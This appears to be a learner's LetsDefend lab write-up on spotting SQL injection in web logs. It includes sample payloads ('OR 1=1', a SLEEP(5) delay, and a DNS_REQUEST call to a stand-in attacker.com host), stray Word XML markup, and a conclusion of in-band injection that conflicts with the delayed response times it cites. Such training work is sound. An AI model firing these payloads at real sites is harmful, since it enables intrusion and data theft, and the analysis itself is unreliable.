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lab I will be investigating an example of a command injection from LetsDefend;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https://app.letsdefend.io/training/lesson_detail/detecting-sql-injection-attacks-web-attacks-101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While the log appears to be normal on the surface, looking through the log I %27 which is commonly used in SQL injection. %27 is when decoded from UTF-8 becomes a single quote ( ‘ ), which is used in several payloads.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an online UTF-8 decoder can help make these attacks more clear.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these logs we see that the attack started 01/Mar/2022:08:35:14.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the IP address of the attacker who performed the SQL Injection attack?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the log shows, the attack came from 192.168.31.167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Was the attack successful?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looking at the logs, I notice that there is a rather large difference in some response times for these commands.The response time ranges from 4500 to 4800 as seen below, meaning that it is likely a SQL injection accord and should be sent to a senior analyst.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is the type of SQL Injection attack? (Classic, Blind, Out-of-band)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Let’s quickly review the three types of SQL injection attacks.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In-band SQLi (Classic SQLi): When the SQL query is sent and received on the same channel.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example:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">SELECT * FROM products WHERE id = 1 OR 1=1;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Inferential SQLi (Blind SQLi): When the attacker does not directly see the result from the query. The attacker will instead gather information via the application's response or behavior.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example, using Sleep() the attacker causes the server to pause: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users WHERE id = 1; IF(1=1, SLEEP(5), 0) --;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Out-of-band SQLi: Occurs when the attacker does not receive a response from the web application but instead using an alternative channel like DNS or HTTP to exfiltrate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example, if the attacker attempts to make a DNS request to send a request to the attacker’s server:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">SELECT NULL, NULL, DNS_REQUEST('attacker.com') –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 what type of SQL Injection attack was this example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this example, It matches with an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Band SQli</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Classic SQLi). The SQL query is sent and received on the same channel.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pp.letsdefend.io/training/lesson_detail/detecting-sql-injection-attacks-web-attacks-101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